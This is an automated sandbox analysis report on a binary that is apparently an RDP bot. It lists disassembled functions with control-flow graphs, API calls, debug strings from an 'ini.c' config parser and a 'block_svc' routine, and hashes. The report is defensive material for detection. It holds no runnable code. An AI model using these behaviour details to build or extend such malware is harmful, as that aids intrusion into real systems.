                                                                                                                                                  Function 00007FF7757297F2 Relevance: 25.7, APIs: 7, Strings: 10, Instructions: 241memorystringCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 497 7ff7757297f2-7ff775729814 498 7ff77572981a-7ff77572982d call 7ff7757245d5 497->498 499 7ff7757298a5-7ff7757298d3 call 7ff7757214e2 497->499 504 7ff7757298d8-7ff7757298e0 498->504 505 7ff775729833-7ff77572983b 498->505 499->505 508 7ff775729b7e-7ff775729b83 504->508 509 7ff7757298e6-7ff775729900 504->509 506 7ff77572983d-7ff77572984e GetProcessHeap HeapFree 505->506 507 7ff775729854-7ff775729856 505->507 506->507 511 7ff775729b9e-7ff775729baf call 7ff7757214e2 507->511 512 7ff77572985c-7ff77572985f 507->512 508->505 510 7ff775729933-7ff77572993a 509->510 516 7ff77572995d-7ff775729998 GetProcessHeap HeapAlloc 510->516 517 7ff77572993c-7ff77572993f 510->517 518 7ff775729bb4 call 7ff7757214e2 511->518 514 7ff775729869-7ff775729876 512->514 515 7ff775729861 512->515 519 7ff77572987c-7ff7757298a4 call 7ff7757214e2 514->519 520 7ff775729b92 514->520 515->514 522 7ff77572999a-7ff7757299a1 516->522 523 7ff7757299d0-7ff7757299e6 call 7ff7757214e2 516->523 517->516 521 7ff775729941-7ff775729947 517->521 520->511 528 7ff775729949 521->528 529 7ff775729918-7ff77572991b 521->529 524 7ff7757299a7-7ff7757299ce 522->524 525 7ff775729b88-7ff775729b8d 522->525 523->522 530 7ff775729a2a-7ff775729a37 524->530 525->505 535 7ff77572994b-7ff77572994e 528->535 536 7ff775729902-7ff775729905 528->536 532 7ff77572991d-7ff775729927 529->532 533 7ff77572992f 529->533 530->505 540 7ff775729a3d-7ff775729a40 530->540 532->533 533->510 538 7ff775729929 535->538 539 7ff775729950-7ff775729953 535->539 536->533 537 7ff775729907-7ff77572990a 536->537 537->533 541 7ff77572990c-7ff775729916 537->541 538->533 539->533 542 7ff775729955-7ff77572995b 539->542 540->505 543 7ff775729a46-7ff775729a4b 540->543 541->533 542->533 544 7ff775729b6e-7ff775729b74 543->544 545 7ff775729a51-7ff775729a53 543->545 544->508 546 7ff7757299e8-7ff7757299eb 545->546 547 7ff775729a55-7ff775729a57 545->547 549 7ff775729a26 546->549 550 7ff7757299ed-7ff7757299f1 546->550 548 7ff775729a59-7ff775729a5c 547->548 547->549 551 7ff775729a5e-7ff775729a61 548->551 552 7ff775729a1c-7ff775729a20 548->552 549->530 550->549 553 7ff7757299f3-7ff775729a11 call 7ff775729770 551->553 554 7ff775729a63-7ff775729aa2 call 7ff775729770 * 2 551->554 552->549 553->552 560 7ff775729a13-7ff775729a16 553->560 554->552 563 7ff775729aa8-7ff775729aad 554->563 560->552 562 7ff775729af8-7ff775729b00 560->562 562->552 564 7ff775729b06-7ff775729b09 562->564 563->552 565 7ff775729ab3-7ff775729af3 strncpy * 2 563->565 566 7ff775729b59-7ff775729b6c 564->566 567 7ff775729b0b-7ff775729b21 564->567 565->552 568 7ff775729b28-7ff775729b54 strncpy 566->568 567->568 568->552
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
                                                                                                                                                  • String ID: (path != NULL)$5$C:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc
                                                                                                                                                  • API String ID: 1423203057-2746879330
                                                                                                                                                  • Opcode ID: c4a5d119b8e46db3d6d484353cd613a654445c2d338f2979c9958e34502116e4
                                                                                                                                                  • Instruction ID: 79158fbff9acfc0573b4fcbc5ea5cc2bb68f1730400597839d8745dfef2ca5b8
                                                                                                                                                  • Opcode Fuzzy Hash: c4a5d119b8e46db3d6d484353cd613a654445c2d338f2979c9958e34502116e4
                                                                                                                                                  • Instruction Fuzzy Hash: 87A1A263A3D68681EA20AB05E4447B9A771EF48F94FCC4032DD8D47785DE6CE585C3A0
                                                                                                                                                  Function 00007FF775729181 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 111memorystringCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 570 7ff775729181-7ff775729186 571 7ff7757290e4-7ff7757290ec 570->571 572 7ff7757290f2-7ff775729109 GetProcessHeap HeapFree 571->572 573 7ff775728e63-7ff775728e6b 571->573 572->573 574 7ff775728e72-7ff775728e82 573->574 576 7ff775728e88-7ff775728e8a 574->576 577 7ff775728da0-7ff775728da3 574->577 576->577 580 7ff775728e90-7ff775728eca call 7ff77572a1f1 576->580 578 7ff775728da9-7ff775728db2 FreeLibrary 577->578 579 7ff775729284-7ff775729299 577->579 578->579 580->574 583 7ff775728ecc-7ff775728f29 strlen 580->583 585 7ff775728e2e-7ff775728e49 call 7ff7757214e2 583->585 586 7ff775728f2f-7ff775728f5e 583->586 585->574 590 7ff775728e4b-7ff775728e5e call 7ff7757214e2 586->590 591 7ff775728f64-7ff775728f8d GetProcessHeap HeapAlloc 586->591 590->573 592 7ff775728f93-7ff775728fac 591->592 593 7ff7757290a4-7ff7757290c4 call 7ff7757214e2 591->593 599 7ff7757290c9-7ff7757290df call 7ff7757214e2 592->599 600 7ff775728fb2-7ff775729067 BuildTrusteeWithSidW BuildSecurityDescriptorW 592->600 593->573 599->571 601 7ff7757291a9-7ff7757291da call 7ff77572795a 600->601 602 7ff77572906d-7ff775729086 call 7ff7757214e2 600->602 611 7ff7757291dc-7ff7757291ea LocalFree 601->611 612 7ff7757291ef-7ff775729205 call 7ff7757214e2 601->612 609 7ff77572910e-7ff775729114 602->609 610 7ff77572908c 602->610 615 7ff77572911a-7ff775729120 609->615 616 7ff775729211-7ff775729216 609->616 613 7ff775729092-7ff77572909f 610->613 614 7ff77572919f-7ff7757291a4 610->614 611->571 612->611 613->571 614->571 618 7ff775729122-7ff775729125 615->618 619 7ff775729153-7ff775729159 615->619 616->571 623 7ff775729127-7ff77572912a 618->623 624 7ff775729140-7ff775729146 618->624 621 7ff775729239-7ff77572923e 619->621 622 7ff77572915f-7ff775729165 619->622 621->571 629 7ff77572916b-7ff775729171 622->629 630 7ff775729243-7ff775729248 622->630 625 7ff77572921b-7ff775729220 623->625 626 7ff775729130-7ff775729133 623->626 627 7ff77572914c-7ff775729151 624->627 628 7ff77572922f-7ff775729234 624->628 625->571 631 7ff775729139-7ff77572913e 626->631 632 7ff775729225-7ff77572922a 626->632 627->571 628->571 633 7ff775729177-7ff77572917c 629->633 634 7ff77572924d-7ff775729252 629->634 630->571 631->571 632->571 633->571 634->571
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
                                                                                                                                                  • String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
                                                                                                                                                  • API String ID: 493744553-3317923414
                                                                                                                                                  • Opcode ID: 28ad85c4949268e3a4ef3da6e723452246f6a5b39becbd9d33f0bbc3e033489c
                                                                                                                                                  • Instruction ID: 6f3e4f6a41456a249751ccf1d793553ed46719b096b50e47cbef5fa5e6fafdc8
                                                                                                                                                  • Opcode Fuzzy Hash: 28ad85c4949268e3a4ef3da6e723452246f6a5b39becbd9d33f0bbc3e033489c
                                                                                                                                                  • Instruction Fuzzy Hash: AB518F3263CBC285E7709B11E4443AAB760FB88B54F804135DA8C87B98EF7ED549CB91
                                                                                                                                                  Function 00007FF77572918B Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 111memorystringCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 635 7ff77572918b-7ff775729190 636 7ff7757290e4-7ff7757290ec 635->636 637 7ff7757290f2-7ff775729109 GetProcessHeap HeapFree 636->637 638 7ff775728e63-7ff775728e6b 636->638 637->638 639 7ff775728e72-7ff775728e82 638->639 641 7ff775728e88-7ff775728e8a 639->641 642 7ff775728da0-7ff775728da3 639->642 641->642 645 7ff775728e90-7ff775728eca call 7ff77572a1f1 641->645 643 7ff775728da9-7ff775728db2 FreeLibrary 642->643 644 7ff775729284-7ff775729299 642->644 643->644 645->639 648 7ff775728ecc-7ff775728f29 strlen 645->648 650 7ff775728e2e-7ff775728e49 call 7ff7757214e2 648->650 651 7ff775728f2f-7ff775728f5e 648->651 650->639 655 7ff775728e4b-7ff775728e5e call 7ff7757214e2 651->655 656 7ff775728f64-7ff775728f8d GetProcessHeap HeapAlloc 651->656 655->638 657 7ff775728f93-7ff775728fac 656->657 658 7ff7757290a4-7ff7757290c4 call 7ff7757214e2 656->658 664 7ff7757290c9-7ff7757290df call 7ff7757214e2 657->664 665 7ff775728fb2-7ff775729067 BuildTrusteeWithSidW BuildSecurityDescriptorW 657->665 658->638 664->636 666 7ff7757291a9-7ff7757291da call 7ff77572795a 665->666 667 7ff77572906d-7ff775729086 call 7ff7757214e2 665->667 676 7ff7757291dc-7ff7757291ea LocalFree 666->676 677 7ff7757291ef-7ff775729205 call 7ff7757214e2 666->677 674 7ff77572910e-7ff775729114 667->674 675 7ff77572908c 667->675 680 7ff77572911a-7ff775729120 674->680 681 7ff775729211-7ff775729216 674->681 678 7ff775729092-7ff77572909f 675->678 679 7ff77572919f-7ff7757291a4 675->679 676->636 677->676 678->636 679->636 683 7ff775729122-7ff775729125 680->683 684 7ff775729153-7ff775729159 680->684 681->636 688 7ff775729127-7ff77572912a 683->688 689 7ff775729140-7ff775729146 683->689 686 7ff775729239-7ff77572923e 684->686 687 7ff77572915f-7ff775729165 684->687 686->636 694 7ff77572916b-7ff775729171 687->694 695 7ff775729243-7ff775729248 687->695 690 7ff77572921b-7ff775729220 688->690 691 7ff775729130-7ff775729133 688->691 692 7ff77572914c-7ff775729151 689->692 693 7ff77572922f-7ff775729234 689->693 690->636 696 7ff775729139-7ff77572913e 691->696 697 7ff775729225-7ff77572922a 691->697 692->636 693->636 698 7ff775729177-7ff77572917c 694->698 699 7ff77572924d-7ff775729252 694->699 695->636 696->636 697->636 698->636 699->636
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
                                                                                                                                                  • String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
                                                                                                                                                  • API String ID: 493744553-3317923414
                                                                                                                                                  • Opcode ID: 811c73c2c255be6a266979c2ff7e8de6f342bbf2b98cf4093f3602435aca306e
                                                                                                                                                  • Instruction ID: 102859af8c13ebdb38cdbb6f26cec7333b5d6591606db7f0c3c8c47eaaebf265
                                                                                                                                                  • Opcode Fuzzy Hash: 811c73c2c255be6a266979c2ff7e8de6f342bbf2b98cf4093f3602435aca306e
                                                                                                                                                  • Instruction Fuzzy Hash: 41518F3263CBC285E7709B11E4443AAB760FB88B54F804135DA8C87B99EF7ED549CB91
                                                                                                                                                  Function 00007FF775729195 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 111memorystringCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 700 7ff775729195-7ff77572919a 701 7ff7757290e4-7ff7757290ec 700->701 702 7ff7757290f2-7ff775729109 GetProcessHeap HeapFree 701->702 703 7ff775728e63-7ff775728e6b 701->703 702->703 704 7ff775728e72-7ff775728e82 703->704 706 7ff775728e88-7ff775728e8a 704->706 707 7ff775728da0-7ff775728da3 704->707 706->707 710 7ff775728e90-7ff775728eca call 7ff77572a1f1 706->710 708 7ff775728da9-7ff775728db2 FreeLibrary 707->708 709 7ff775729284-7ff775729299 707->709 708->709 710->704 713 7ff775728ecc-7ff775728f29 strlen 710->713 715 7ff775728e2e-7ff775728e49 call 7ff7757214e2 713->715 716 7ff775728f2f-7ff775728f5e 713->716 715->704 720 7ff775728e4b-7ff775728e5e call 7ff7757214e2 716->720 721 7ff775728f64-7ff775728f8d GetProcessHeap HeapAlloc 716->721 720->703 722 7ff775728f93-7ff775728fac 721->722 723 7ff7757290a4-7ff7757290c4 call 7ff7757214e2 721->723 729 7ff7757290c9-7ff7757290df call 7ff7757214e2 722->729 730 7ff775728fb2-7ff775729067 BuildTrusteeWithSidW BuildSecurityDescriptorW 722->730 723->703 729->701 731 7ff7757291a9-7ff7757291da call 7ff77572795a 730->731 732 7ff77572906d-7ff775729086 call 7ff7757214e2 730->732 741 7ff7757291dc-7ff7757291ea LocalFree 731->741 742 7ff7757291ef-7ff775729205 call 7ff7757214e2 731->742 739 7ff77572910e-7ff775729114 732->739 740 7ff77572908c 732->740 745 7ff77572911a-7ff775729120 739->745 746 7ff775729211-7ff775729216 739->746 743 7ff775729092-7ff77572909f 740->743 744 7ff77572919f-7ff7757291a4 740->744 741->701 742->741 743->701 744->701 748 7ff775729122-7ff775729125 745->748 749 7ff775729153-7ff775729159 745->749 746->701 753 7ff775729127-7ff77572912a 748->753 754 7ff775729140-7ff775729146 748->754 751 7ff775729239-7ff77572923e 749->751 752 7ff77572915f-7ff775729165 749->752 751->701 759 7ff77572916b-7ff775729171 752->759 760 7ff775729243-7ff775729248 752->760 755 7ff77572921b-7ff775729220 753->755 756 7ff775729130-7ff775729133 753->756 757 7ff77572914c-7ff775729151 754->757 758 7ff77572922f-7ff775729234 754->758 755->701 761 7ff775729139-7ff77572913e 756->761 762 7ff775729225-7ff77572922a 756->762 757->701 758->701 763 7ff775729177-7ff77572917c 759->763 764 7ff77572924d-7ff775729252 759->764 760->701 761->701 762->701 763->701 764->701
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
                                                                                                                                                  • String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
                                                                                                                                                  • API String ID: 493744553-3317923414
                                                                                                                                                  • Opcode ID: bf0049cc36aa2b87156958a37f5100f470e96f61e41f2cae54f4d89468e99936
                                                                                                                                                  • Instruction ID: c9c4b1b90d6caa3d81a261dcd968fb8e867bacbdfbae152599450a2ff76112c0
                                                                                                                                                  • Opcode Fuzzy Hash: bf0049cc36aa2b87156958a37f5100f470e96f61e41f2cae54f4d89468e99936
                                                                                                                                                  • Instruction Fuzzy Hash: 4651703263CBC285E7709B11E4443AAB760FB88B54F804135DA8C87B98EF7DD549CB91
                                                                                                                                                  Function 00007FF775729D40 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 97stringCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strcmp
                                                                                                                                                  • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                                                                                                                                                  • API String ID: 1004003707-3780280517
                                                                                                                                                  • Opcode ID: 73da1e0966c3561dd717aab4f139a3398c39c780c5d8b23f88eacfb16f54bf38
                                                                                                                                                  • Instruction ID: f13f75907180343ba0aedb897f19438c610a7dbce810494eabdff42439530eac
                                                                                                                                                  • Opcode Fuzzy Hash: 73da1e0966c3561dd717aab4f139a3398c39c780c5d8b23f88eacfb16f54bf38
                                                                                                                                                  • Instruction Fuzzy Hash: 8D41F8B3E3868791EB60AB40E8407F4A760FF48B58FD84136DA4D46595DF7CA689C3A0
                                                                                                                                                  Function 00007FF775729BB9 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 90stringCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strcmp
                                                                                                                                                  • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                                                                                                                                                  • API String ID: 1004003707-386092548
                                                                                                                                                  • Opcode ID: 44ee8d190fb84950133145d9770a66678910dea851f0071a126621abf7bb8b0c
                                                                                                                                                  • Instruction ID: 0ccb1a98d09976873fc4fe8622ec495f12a6c209b6be513b97aabc6296400761
                                                                                                                                                  • Opcode Fuzzy Hash: 44ee8d190fb84950133145d9770a66678910dea851f0071a126621abf7bb8b0c
                                                                                                                                                  • Instruction Fuzzy Hash: 47413263A385C795FA20AB50E8407B4A7A0FF48B58FD84036D94D0A595DF7CA9C9D3E0
                                                                                                                                                  Function 00007FF77572A0F0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 68COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno
                                                                                                                                                  • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
                                                                                                                                                  • API String ID: 2918714741-1670302297
                                                                                                                                                  • Opcode ID: 48d8c4aec0c11063c26797bf0765ef4c66b22d52fb4a92b42e2fbd3b3769492f
                                                                                                                                                  • Instruction ID: 01f42dc098a6b3ee798924f8336bb29fc473234c4c1c6b07a4f66498d72d5f86
                                                                                                                                                  • Opcode Fuzzy Hash: 48d8c4aec0c11063c26797bf0765ef4c66b22d52fb4a92b42e2fbd3b3769492f
                                                                                                                                                  • Instruction Fuzzy Hash: F9219163A3868696E721AF15EC40BAAB770FB48BA4FC44032EE4C47654DF7CD845C7A0
                                                                                                                                                  Function 00007FF7757214E2 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 91fileCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                                                                                                                                                  • String ID: .$1
                                                                                                                                                  • API String ID: 513531256-1839485796
                                                                                                                                                  • Opcode ID: 32402bb36cf6c4058c43ba99a49dc3a81660aa1839c62e2d7fd324598b5362bd
                                                                                                                                                  • Instruction ID: 94af9f17a1bb79f82b07933dda033e3a43f061baa535f94c4bce15234776973c
                                                                                                                                                  • Opcode Fuzzy Hash: 32402bb36cf6c4058c43ba99a49dc3a81660aa1839c62e2d7fd324598b5362bd
                                                                                                                                                  • Instruction Fuzzy Hash: 3C416F23A3868186F320BB12E8517AAA360FB8CFA0FC00035DA4D47795DF2CE585C7E0
                                                                                                                                                  Function 00007FF7757276D0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
